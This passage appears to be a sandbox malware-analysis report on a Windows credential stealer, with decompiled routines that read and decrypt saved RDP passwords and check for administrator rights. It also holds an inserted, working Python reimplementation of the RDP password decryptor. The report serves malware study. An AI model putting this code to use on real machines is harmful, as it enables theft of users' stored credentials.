                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                                    • String ID: Microsoft_WinInet_*$icA
                                                                    • API String ID: 3891647360-3506372221
                                                                    • Opcode ID: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                                                    • Instruction ID: ec4eec63bcc124374d5f2d7e6b4d46d77861198517d8893598619f99e1c26cfb
                                                                    • Opcode Fuzzy Hash: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                                                    • Instruction Fuzzy Hash: 9C312D71A00209EADF21CF84DD05BEEB7B4EB44315F15443AE951B61D0D3BC9A94CBAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E0040CE3D(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v20;
                                                                    				signed char _v24;
                                                                    				signed char _v28;
                                                                    				signed char _v32;
                                                                    				void* _v36;
                                                                    				char _v40;
                                                                    				void* _v44;
                                                                    				char _v48;
                                                                    				signed char _t40;
                                                                    				signed char _t43;
                                                                    				signed char _t47;
                                                                    				signed char _t52;
                                                                    				signed char _t54;
                                                                    				signed char _t58;
                                                                    				signed char _t63;
                                                                    				signed char _t64;
                                                                    				char _t65;
                                                                    
                                                                    				if( *0x414b43 != 0) {
                                                                    					_t40 = E00401FFD(__eflags, _a8,  &_v20);
                                                                    					__eflags = _t40;
                                                                    					if(_t40 != 0) {
                                                                    						__eflags = _v8 - 0x100000;
                                                                    						if(_v8 >= 0x100000) {
                                                                    							L23:
                                                                    							return E00402091( &_v20);
                                                                    						}
                                                                    						_t43 = E004023A8(_v12, _v8);
                                                                    						__eflags = _t43;
                                                                    						if(_t43 != 0) {
                                                                    							goto L23;
                                                                    						}
                                                                    						_v24 = E0040CD6B("username:s:", _v12, _v8);
                                                                    						_v28 = E0040CD6B("password 51:b:", _v12, _v8);
                                                                    						_t47 = E0040CD6B("full address:s:", _v12, _v8);
                                                                    						_v32 = _t47;
                                                                    						__eflags = _v24;
                                                                    						if(_v24 == 0) {
                                                                    							L22:
                                                                    							E004018B8(_v24);
                                                                    							E004018B8(_v28);
                                                                    							E004018B8(_v32);
                                                                    							goto L23;
                                                                    						}
                                                                    						__eflags = _v28;
                                                                    						if(_v28 == 0) {
                                                                    							goto L22;
                                                                    						}
                                                                    						__eflags = _v32;
                                                                    						if(_v32 != 0) {
                                                                    							_push(_v28);
                                                                    							L0041066A();
                                                                    							_t63 = _t47 >> 1;
                                                                    							_push(_t63);
                                                                    							while(1) {
                                                                    								_t64 = _t63;
                                                                    								__eflags = _t64;
                                                                    								if(_t64 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								asm("lodsw");
                                                                    								__eflags = _t47 - 0x30;
                                                                    								if(_t47 < 0x30) {
                                                                    									L12:
                                                                    									_t52 = _t47 - 0x41 + 0xa;
                                                                    									__eflags = _t52;
                                                                    									L13:
                                                                    									__eflags = _t52 - 0x30;
                                                                    									if(_t52 < 0x30) {
                                                                    										L16:
                                                                    										_t54 = _t52 - 0x41 + 0xa;
                                                                    										__eflags = _t54;
                                                                    										L17:
                                                                    										_t47 = _t54 << 0x00000004 | _t54 << 0x00000004;
                                                                    										asm("stosb");
                                                                    										_t63 = _t64 - 1;
                                                                    										__eflags = _t63;
                                                                    										continue;
                                                                    									}
                                                                    									__eflags = _t52 - 0x39;
                                                                    									if(_t52 > 0x39) {
                                                                    										goto L16;
                                                                    									}
                                                                    									_t54 = _t52 - 0x30;
                                                                    									goto L17;
                                                                    								}
                                                                    								__eflags = _t47 - 0x39;
                                                                    								if(_t47 > 0x39) {
                                                                    									goto L12;
                                                                    								}
                                                                    								_t52 = _t47 - 0x30;
                                                                    								goto L13;
                                                                    							}
                                                                    							_pop(_t65);
                                                                    							_v40 = _t65;
                                                                    							_push(_v28);
                                                                    							_pop( *_t22);
                                                                    							_v44 = 0;
                                                                    							_t58 =  *0x414b43( &_v40, 0, 0, 0, 0, 1,  &_v48);
                                                                    							__eflags = _t58;
                                                                    							if(_t58 != 0) {
                                                                    								__eflags = _v44;
                                                                    								if(__eflags != 0) {
                                                                    									E0040CC29(__eflags, _a4, _v24, _v32, _v44, _v48);
                                                                    									LocalFree(_v44);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L22;
                                                                    					}
                                                                    					return _t40;
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}

                                                                    Instruction addresses for the listing above, 0x0040ce4c through 0x0040cf98 (the per-line address column did not survive extraction).

                                                                    APIs
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040CEE2
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
                                                                    • LocalFree.KERNEL32(00000000), ref: 0040CF6F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                    • String ID: full address:s:$password 51:b:$username:s:
                                                                    • API String ID: 2920030623-2945746679
                                                                    • Opcode ID: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
                                                                    • Instruction ID: 54cf008bb3eae58b1a30e6a5af3c8a5bf0615ee99b7eb6d7c5b05f7a3dd5831b
                                                                    • Opcode Fuzzy Hash: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
                                                                    • Instruction Fuzzy Hash: FE414F3190010AEADF11ABE5C886BEEBF76EF44714F10423BE601711E1D7794A92DB5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 35%
                                                                    			E0040AB24(unsigned int __eax, void* _a4, unsigned int* _a8) {
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				void* _v16;
                                                                    				int _v20;
                                                                    				unsigned int _t23;
                                                                    				intOrPtr _t25;
                                                                    				void* _t28;
                                                                    				unsigned int _t45;
                                                                    				unsigned int _t46;
                                                                    				intOrPtr* _t56;
                                                                    
                                                                    				 *_a8 = 0;
                                                                    				_push(_a4);
                                                                    				L0041066A();
                                                                    				if(__eax > 1) {
                                                                    					_t23 = __eax >> 1;
                                                                    					 *_a8 = _t23;
                                                                    					_t45 = _t23;
                                                                    					if(_t23 < 0) {
                                                                    						L25:
                                                                    						return 0;
                                                                    					} else {
                                                                    						_t56 = _a4;
                                                                    						while(1) {
                                                                    							_t46 = _t45;
                                                                    							if(_t46 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t25 =  *_t56;
                                                                    							if(_t25 < 0x30 || _t25 > 0x39) {
                                                                    								if(_t25 < 0x41 || _t25 > 0x46) {
                                                                    									return 0;
                                                                    								} else {
                                                                    									_t28 = _t25 - 0x41 + 0xa;
                                                                    									goto L11;
                                                                    								}
                                                                    							} else {
                                                                    								_t28 = _t25 - 0x30;
                                                                    								L11:
                                                                    								if(_t28 < 0x30 || _t28 > 0x39) {
                                                                    									if(_t28 < 0x41 || _t28 > 0x46) {
                                                                    										return 0;
                                                                    									} else {
                                                                    										goto L18;
                                                                    									}
                                                                    								} else {
                                                                    									L18:
                                                                    									asm("stosb");
                                                                    									_t45 = _t46 - 1;
                                                                    									_t56 = _t56 + 2;
                                                                    									continue;
                                                                    								}
                                                                    							}
                                                                    							goto L26;
                                                                    						}
                                                                    						 *_t7 =  *_a8;
                                                                    						_push(_a4);
                                                                    						_pop( *_t9);
                                                                    						_v16 = 0;
                                                                    						if( *0x414b43 == 0) {
                                                                    							goto L25;
                                                                    						} else {
                                                                    							_push( &_v20);
                                                                    							_push(1);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push( &_v12);
                                                                    							if( *0x414b43() == 0 || _v16 == 0 || _v20 >  *_a8) {
                                                                    								goto L25;
                                                                    							} else {
                                                                    								asm("cld");
                                                                    								asm("jecxz 0x4");
                                                                    								memcpy(_a4, _v16, _v20);
                                                                    								_push(_v20);
                                                                    								_pop( *__eax);
                                                                    								LocalFree(_v16);
                                                                    								return 1;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					return 0;
                                                                    				}
                                                                    				L26:
                                                                    			}

                                                                    Instruction addresses for the listing above, 0x0040ab30 through 0x0040ac3b (the per-line address column did not survive extraction).

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?), ref: 0040AB39
                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                                                    • LocalFree.KERNEL32(00000000), ref: 0040AC24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2920030623-0
                                                                    • Opcode ID: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
                                                                    • Instruction ID: 9475b3dff48bb3a680590f8f4b8fbf70d62397470b3612e928ce05771e3a80a2
                                                                    • Opcode Fuzzy Hash: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
                                                                    • Instruction Fuzzy Hash: C731C7776042099FEF209E58D844BCDB776EB85374F504133DB51A72C4D2BCAA92CA4E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
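The two listings above (the routine ending at 0x0040CF98, whose string references are the .rdp file keys full address:s:, username:s: and password 51:b:, and E0040AB24) implement the same credential path: hex-decode a password 51:b: value in place and hand the resulting DPAPI blob to CryptUnprotectData. The Python below is an added example written for this report, not code from the sample or the sandbox. It parses a constructed .rdp text, decodes the hex field the way E0040AB24 does (only upper-case digits are accepted, anything else makes the routine fail; the length > 1 check and the lstrlen >> 1 pair count are kept, so a trailing odd character is ignored) and, on Windows only, calls CryptUnprotectData with the same flag value 1 (CRYPTPROTECT_UI_FORBIDDEN) seen in the decompiled call. The host, user name and hex blob in the sample text are constructed placeholders; the blob is only the 20-byte DPAPI header, not a real encrypted password.

```python
"""Added example (not part of the report or the sample): the .rdp credential path
the decompiled routines follow, reproduced in Python so the 'password 51:b:' field
and the DPAPI step can be examined on a workstation."""
import ctypes
import sys

# The sample accepts only upper-case hex digits ('0'-'9', 'A'-'F'); mstsc writes
# the field in upper case, so this is sufficient for its purpose.
HEX_DIGITS = "0123456789ABCDEF"

# Constructed sample .rdp content (placeholders, not real data). The blob is the
# standard DPAPI header: version 1 followed by the provider GUID.
SAMPLE_RDP = """\
full address:s:ts01.corp.example:3389
username:s:CORP\\jdoe
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB
"""


def parse_rdp(text):
    """Return {name: (type, value)} for the 'name:type:value' lines of an .rdp file."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.count(":") < 2:
            continue
        name, typ, value = line.split(":", 2)   # the value may itself contain ':'
        fields[name] = (typ, value)
    return fields


def decode_password_51(hexstr):
    """In-place hex decoder as E0040AB24 does it: two characters -> one byte.
    Returns None where the sample returns 0 (length <= 1, or a non-upper-case-hex
    character); a trailing odd character is dropped, matching lstrlen >> 1."""
    if len(hexstr) < 2:
        return None
    out = bytearray()
    for i in range(0, len(hexstr) // 2 * 2, 2):
        hi, lo = hexstr[i], hexstr[i + 1]
        if hi not in HEX_DIGITS or lo not in HEX_DIGITS:
            return None
        out.append(HEX_DIGITS.index(hi) << 4 | HEX_DIGITS.index(lo))
    return bytes(out)


def extract_rdp_credential(rdp_text):
    """The (host, user, DPAPI blob) triple the stealer collects from one .rdp file."""
    f = parse_rdp(rdp_text)
    host = f.get("full address", ("s", ""))[1]
    user = f.get("username", ("s", ""))[1]
    blob = decode_password_51(f.get("password 51", ("b", ""))[1])
    return host, user, blob


def dpapi_unprotect(blob):
    """CryptUnprotectData(blob, NULL, NULL, NULL, NULL, 1, &out) as at 0x0040CF48 and
    0x0040ABF1. Works only on Windows and only as the user who protected the data;
    returns None on other platforms or when the call fails."""
    if sys.platform != "win32":
        return None

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", ctypes.c_uint32),
                    ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(blob, len(blob))   # keep alive during the call
    inp = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    out = DATA_BLOB()
    crypt32 = ctypes.windll.crypt32
    # flag 1 == CRYPTPROTECT_UI_FORBIDDEN, the constant visible in the decompiled call
    if not crypt32.CryptUnprotectData(ctypes.byref(inp), None, None, None, None, 1,
                                      ctypes.byref(out)):
        return None
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(out.pbData)   # matches the LocalFree in the listing


if __name__ == "__main__":
    host, user, blob = extract_rdp_credential(SAMPLE_RDP)
    print(host, user, blob.hex() if blob else None)
    plain = dpapi_unprotect(blob) if blob else None
    print(plain.decode("utf-16-le") if plain else "not decrypted (wrong platform, user or blob)")
```

The plaintext CryptUnprotectData returns for an mstsc-saved password is UTF-16LE, hence the decode above. Because DPAPI is keyed to the logon secret of the user who saved the file, the call only succeeds inside that user's session, which is why the stealer performs the decryption on the victim host rather than exfiltrating the blob.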

                                                                    C-Code - Quality: 39%
                                                                    			E004044D2() {
                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v10;
                                                                    				void* _v16;
                                                                    				long _v20;
                                                                    				char* _t16;
                                                                    				int _t20;
                                                                    
                                                                    				if( *0x414aff != 0 &&  *0x414b03 != 0 &&  *0x414b07 != 0) {
                                                                    					_t16 =  &_v10;
                                                                    					 *_t16 = 0;
                                                                    					 *((char*)(_t16 + 1)) = 0;
                                                                    					 *((char*)(_t16 + 2)) = 0;
                                                                    					 *((char*)(_t16 + 3)) = 0;
                                                                    					 *((char*)(_t16 + 4)) = 0;
                                                                    					 *((char*)(_t16 + 5)) = 5;
                                                                    					_t20 = AllocateAndInitializeSid( &_v10, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16);
                                                                    					if(_t20 != 0) {
                                                                    						_v20 = 0;
                                                                    						_push( &_v20);
                                                                    						_push(_v16);
                                                                    						_push(0);
                                                                    						if( *0x414b03() == 0) {
                                                                    							_v20 = 0;
                                                                    						}
                                                                    						FreeSid(_v16);
                                                                    						return _v20;
                                                                    					} else {
                                                                    						return _t20;
                                                                    					}
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
                                                                    • FreeSid.ADVAPI32(?), ref: 00404561
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                                                    • Instruction ID: e42ff38ce7fd43cd37d3952dc6f34b3e9485a0eb1960dbb1a6bbd8e72996f532
                                                                    • Opcode Fuzzy Hash: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                                                    • Instruction Fuzzy Hash: AA114470504249EEEB11CB94DC1DB9EBBF4AB50309F05C0B5D154AB2E1D3B9E908C7AA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                                                    • LocalFree.KERNEL32(00000000), ref: 0040445C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CryptDataFreeLocalUnprotect
                                                                    • String ID:
                                                                    • API String ID: 1561624719-0
                                                                    • Opcode ID: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                                                    • Instruction ID: d6296d7f62e99f81d38af1605d697d2135ce95648fdc9c4461f15ac0c6790018
                                                                    • Opcode Fuzzy Hash: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                                                    • Instruction Fuzzy Hash: 0C112875A00218EBDF118E94DC44BDEBB74FB84361F448466FA21662D0C378AA40CB49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 49%
                                                                    			E00402EFD(void* __eax, intOrPtr* _a4, intOrPtr* _a8, char _a12) {
                                                                    				char _v8;
                                                                    				signed int _t211;
                                                                    				signed int _t214;
                                                                    				signed int _t217;
                                                                    				signed int _t220;
                                                                    				signed int _t223;
                                                                    				signed int _t226;
                                                                    				signed int _t229;
                                                                    				signed int _t232;
                                                                    				signed int _t235;
                                                                    				signed int _t238;
                                                                    				signed int _t241;
                                                                    				signed int _t244;
                                                                    				signed int _t247;
                                                                    				signed int _t250;
                                                                    				signed int _t253;
                                                                    				signed int _t256;
                                                                    				signed int _t257;
                                                                    				signed int _t260;
                                                                    				signed int _t263;
                                                                    				signed int _t266;
                                                                    				signed int _t269;
                                                                    				signed int _t272;
                                                                    				signed int _t275;
                                                                    				signed int _t278;
                                                                    				signed int _t281;
                                                                    				signed int _t284;
                                                                    				signed int _t287;
                                                                    				signed int _t290;
                                                                    				signed int _t293;
                                                                    				signed int _t296;
                                                                    				signed int _t299;
                                                                    				signed int _t302;
                                                                    				signed int _t306;
                                                                    				signed int _t309;
                                                                    				signed int _t312;
                                                                    				signed int _t315;
                                                                    				signed int _t318;
                                                                    				signed int _t321;
                                                                    				signed int _t324;
                                                                    				signed int _t327;
                                                                    				signed int _t330;
                                                                    				signed int _t333;
                                                                    				signed int _t336;
                                                                    				signed int _t339;
                                                                    				signed int _t342;
                                                                    				signed int _t345;
                                                                    				signed int _t348;
                                                                    				signed int _t351;
                                                                    				signed int _t354;
                                                                    				signed int _t355;
                                                                    				signed int _t358;
                                                                    				signed int _t361;
                                                                    				signed int _t364;
                                                                    				signed int _t367;
                                                                    				signed int _t370;
                                                                    				signed int _t373;
                                                                    				signed int _t376;
                                                                    				signed int _t379;
                                                                    				signed int _t382;
                                                                    				signed int _t385;
                                                                    				signed int _t388;
                                                                    				signed int _t391;
                                                                    				signed int _t394;
                                                                    				signed int _t397;
                                                                    				signed int _t400;
                                                                    				signed int _t403;
                                                                    				intOrPtr* _t404;
                                                                    				intOrPtr* _t645;
                                                                    
                                                                    				_t645 = _a8;
                                                                    				_t404 = _a4;
                                                                    				_v8 = _a12;
                                                                    				do {
                                                                    					_t257 =  *(_t404 + 4);
                                                                    					_t306 =  *(_t404 + 8);
                                                                    					_t355 =  *(_t404 + 0xc);
                                                                    					asm("rol eax, 0x7");
                                                                    					_t211 = ((_t306 ^ _t355) & _t257 ^ _t355) +  *_t404 - 0x28955b88 +  *_t645 + _t257;
                                                                    					asm("rol edx, 0xc");
                                                                    					_t358 = ((_t257 ^ _t306) & _t211 ^ _t306) + _t355 - 0x173848aa +  *((intOrPtr*)(_t645 + 4)) + _t211;
                                                                    					asm("rol ecx, 0x11");
                                                                    					_t309 = ((_t211 ^ _t257) & _t358 ^ _t257) + _t306 + 0x242070db +  *((intOrPtr*)(_t645 + 8)) + _t358;
                                                                    					asm("rol ebx, 0x16");
                                                                    					_t260 = ((_t358 ^ _t211) & _t309 ^ _t211) + _t257 - 0x3e423112 +  *((intOrPtr*)(_t645 + 0xc)) + _t309;
                                                                    					asm("rol eax, 0x7");
                                                                    					_t214 = ((_t309 ^ _t358) & _t260 ^ _t358) + _t211 - 0xa83f051 +  *((intOrPtr*)(_t645 + 0x10)) + _t260;
                                                                    					asm("rol edx, 0xc");
                                                                    					_t361 = ((_t260 ^ _t309) & _t214 ^ _t309) + _t358 + 0x4787c62a +  *((intOrPtr*)(_t645 + 0x14)) + _t214;
                                                                    					asm("rol ecx, 0x11");
                                                                    					_t312 = ((_t214 ^ _t260) & _t361 ^ _t260) + _t309 - 0x57cfb9ed +  *((intOrPtr*)(_t645 + 0x18)) + _t361;
                                                                    					asm("rol ebx, 0x16");
                                                                    					_t263 = ((_t361 ^ _t214) & _t312 ^ _t214) + _t260 - 0x2b96aff +  *((intOrPtr*)(_t645 + 0x1c)) + _t312;
                                                                    					asm("rol eax, 0x7");
                                                                    					_t217 = ((_t312 ^ _t361) & _t263 ^ _t361) + _t214 + 0x698098d8 +  *((intOrPtr*)(_t645 + 0x20)) + _t263;
                                                                    					asm("rol edx, 0xc");
                                                                    					_t364 = ((_t263 ^ _t312) & _t217 ^ _t312) + _t361 - 0x74bb0851 +  *((intOrPtr*)(_t645 + 0x24)) + _t217;
                                                                    					asm("rol ecx, 0x11");
                                                                    					_t315 = ((_t217 ^ _t263) & _t364 ^ _t263) + _t312 - 0xa44f +  *((intOrPtr*)(_t645 + 0x28)) + _t364;
                                                                    					asm("rol ebx, 0x16");
                                                                    					_t266 = ((_t364 ^ _t217) & _t315 ^ _t217) + _t263 - 0x76a32842 +  *((intOrPtr*)(_t645 + 0x2c)) + _t315;
                                                                    					asm("rol eax, 0x7");
                                                                    					_t220 = ((_t315 ^ _t364) & _t266 ^ _t364) + _t217 + 0x6b901122 +  *((intOrPtr*)(_t645 + 0x30)) + _t266;
                                                                    					asm("rol edx, 0xc");
                                                                    					_t367 = ((_t266 ^ _t315) & _t220 ^ _t315) + _t364 - 0x2678e6d +  *((intOrPtr*)(_t645 + 0x34)) + _t220;
                                                                    					asm("rol ecx, 0x11");
                                                                    					_t318 = ((_t220 ^ _t266) & _t367 ^ _t266) + _t315 - 0x5986bc72 +  *((intOrPtr*)(_t645 + 0x38)) + _t367;
                                                                    					asm("rol ebx, 0x16");
                                                                    					_t269 = ((_t367 ^ _t220) & _t318 ^ _t220) + _t266 + 0x49b40821 +  *((intOrPtr*)(_t645 + 0x3c)) + _t318;
                                                                    					asm("rol eax, 0x5");
                                                                    					_t223 = ((_t318 ^ _t269) & _t367 ^ _t318) + _t220 - 0x9e1da9e +  *((intOrPtr*)(_t645 + 4)) + _t269;
                                                                    					asm("rol edx, 0x9");
                                                                    					_t370 = ((_t269 ^ _t223) & _t318 ^ _t269) + _t367 - 0x3fbf4cc0 +  *((intOrPtr*)(_t645 + 0x18)) + _t223;
                                                                    					asm("rol ecx, 0xe");
                                                                    					_t321 = ((_t223 ^ _t370) & _t269 ^ _t223) + _t318 + 0x265e5a51 +  *((intOrPtr*)(_t645 + 0x2c)) + _t370;
                                                                    					asm("rol ebx, 0x14");
                                                                    					_t272 = ((_t370 ^ _t321) & _t223 ^ _t370) + _t269 - 0x16493856 +  *_t645 + _t321;
                                                                    					asm("rol eax, 0x5");
                                                                    					_t226 = ((_t321 ^ _t272) & _t370 ^ _t321) + _t223 - 0x29d0efa3 +  *((intOrPtr*)(_t645 + 0x14)) + _t272;
                                                                    					asm("rol edx, 0x9");
                                                                    					_t373 = ((_t272 ^ _t226) & _t321 ^ _t272) + _t370 + 0x2441453 +  *((intOrPtr*)(_t645 + 0x28)) + _t226;
                                                                    					asm("rol ecx, 0xe");
                                                                    					_t324 = ((_t226 ^ _t373) & _t272 ^ _t226) + _t321 - 0x275e197f +  *((intOrPtr*)(_t645 + 0x3c)) + _t373;
                                                                    					asm("rol ebx, 0x14");
                                                                    					_t275 = ((_t373 ^ _t324) & _t226 ^ _t373) + _t272 - 0x182c0438 +  *((intOrPtr*)(_t645 + 0x10)) + _t324;
                                                                    					asm("rol eax, 0x5");
                                                                    					_t229 = ((_t324 ^ _t275) & _t373 ^ _t324) + _t226 + 0x21e1cde6 +  *((intOrPtr*)(_t645 + 0x24)) + _t275;
                                                                    					asm("rol edx, 0x9");
                                                                    					_t376 = ((_t275 ^ _t229) & _t324 ^ _t275) + _t373 - 0x3cc8f82a +  *((intOrPtr*)(_t645 + 0x38)) + _t229;
                                                                    					asm("rol ecx, 0xe");
                                                                    					_t327 = ((_t229 ^ _t376) & _t275 ^ _t229) + _t324 - 0xb2af279 +  *((intOrPtr*)(_t645 + 0xc)) + _t376;
                                                                    					asm("rol ebx, 0x14");
                                                                    					_t278 = ((_t376 ^ _t327) & _t229 ^ _t376) + _t275 + 0x455a14ed +  *((intOrPtr*)(_t645 + 0x20)) + _t327;
                                                                    					asm("rol eax, 0x5");
                                                                    					_t232 = ((_t327 ^ _t278) & _t376 ^ _t327) + _t229 - 0x561c16fb +  *((intOrPtr*)(_t645 + 0x34)) + _t278;
                                                                    					asm("rol edx, 0x9");
                                                                    					_t379 = ((_t278 ^ _t232) & _t327 ^ _t278) + _t376 - 0x3105c08 +  *((intOrPtr*)(_t645 + 8)) + _t232;
                                                                    					asm("rol ecx, 0xe");
                                                                    					_t330 = ((_t232 ^ _t379) & _t278 ^ _t232) + _t327 + 0x676f02d9 +  *((intOrPtr*)(_t645 + 0x1c)) + _t379;
                                                                    					asm("rol ebx, 0x14");
                                                                    					_t281 = ((_t379 ^ _t330) & _t232 ^ _t379) + _t278 - 0x72d5b376 +  *((intOrPtr*)(_t645 + 0x30)) + _t330;
                                                                    					asm("rol eax, 0x4");
                                                                    					_t235 = (_t330 ^ _t379 ^ _t281) + _t232 - 0x5c6be +  *((intOrPtr*)(_t645 + 0x14)) + _t281;
                                                                    					asm("rol edx, 0xb");
                                                                    					_t382 = (_t281 ^ _t330 ^ _t235) + _t379 - 0x788e097f +  *((intOrPtr*)(_t645 + 0x20)) + _t235;
                                                                    					asm("rol ecx, 0x10");
                                                                    					_t333 = (_t235 ^ _t281 ^ _t382) + _t330 + 0x6d9d6122 +  *((intOrPtr*)(_t645 + 0x2c)) + _t382;
                                                                    					asm("rol ebx, 0x17");
                                                                    					_t284 = (_t382 ^ _t235 ^ _t333) + _t281 - 0x21ac7f4 +  *((intOrPtr*)(_t645 + 0x38)) + _t333;
                                                                    					asm("rol eax, 0x4");
                                                                    					_t238 = (_t333 ^ _t382 ^ _t284) + _t235 - 0x5b4115bc +  *((intOrPtr*)(_t645 + 4)) + _t284;
                                                                    					asm("rol edx, 0xb");
                                                                    					_t385 = (_t284 ^ _t333 ^ _t238) + _t382 + 0x4bdecfa9 +  *((intOrPtr*)(_t645 + 0x10)) + _t238;
                                                                    					asm("rol ecx, 0x10");
                                                                    					_t336 = (_t238 ^ _t284 ^ _t385) + _t333 - 0x944b4a0 +  *((intOrPtr*)(_t645 + 0x1c)) + _t385;
                                                                    					asm("rol ebx, 0x17");
                                                                    					_t287 = (_t385 ^ _t238 ^ _t336) + _t284 - 0x41404390 +  *((intOrPtr*)(_t645 + 0x28)) + _t336;
                                                                    					asm("rol eax, 0x4");
                                                                    					_t241 = (_t336 ^ _t385 ^ _t287) + _t238 + 0x289b7ec6 +  *((intOrPtr*)(_t645 + 0x34)) + _t287;
                                                                    					asm("rol edx, 0xb");
                                                                    					_t388 = (_t287 ^ _t336 ^ _t241) + _t385 - 0x155ed806 +  *_t645 + _t241;
                                                                    					asm("rol ecx, 0x10");
                                                                    					_t339 = (_t241 ^ _t287 ^ _t388) + _t336 - 0x2b10cf7b +  *((intOrPtr*)(_t645 + 0xc)) + _t388;
                                                                    					asm("rol ebx, 0x17");
                                                                    					_t290 = (_t388 ^ _t241 ^ _t339) + _t287 + 0x4881d05 +  *((intOrPtr*)(_t645 + 0x18)) + _t339;
                                                                    					asm("rol eax, 0x4");
                                                                    					_t244 = (_t339 ^ _t388 ^ _t290) + _t241 - 0x262b2fc7 +  *((intOrPtr*)(_t645 + 0x24)) + _t290;
                                                                    					asm("rol edx, 0xb");
                                                                    					_t391 = (_t290 ^ _t339 ^ _t244) + _t388 - 0x1924661b +  *((intOrPtr*)(_t645 + 0x30)) + _t244;
                                                                    					asm("rol ecx, 0x10");
                                                                    					_t342 = (_t244 ^ _t290 ^ _t391) + _t339 + 0x1fa27cf8 +  *((intOrPtr*)(_t645 + 0x3c)) + _t391;
                                                                    					asm("rol ebx, 0x17");
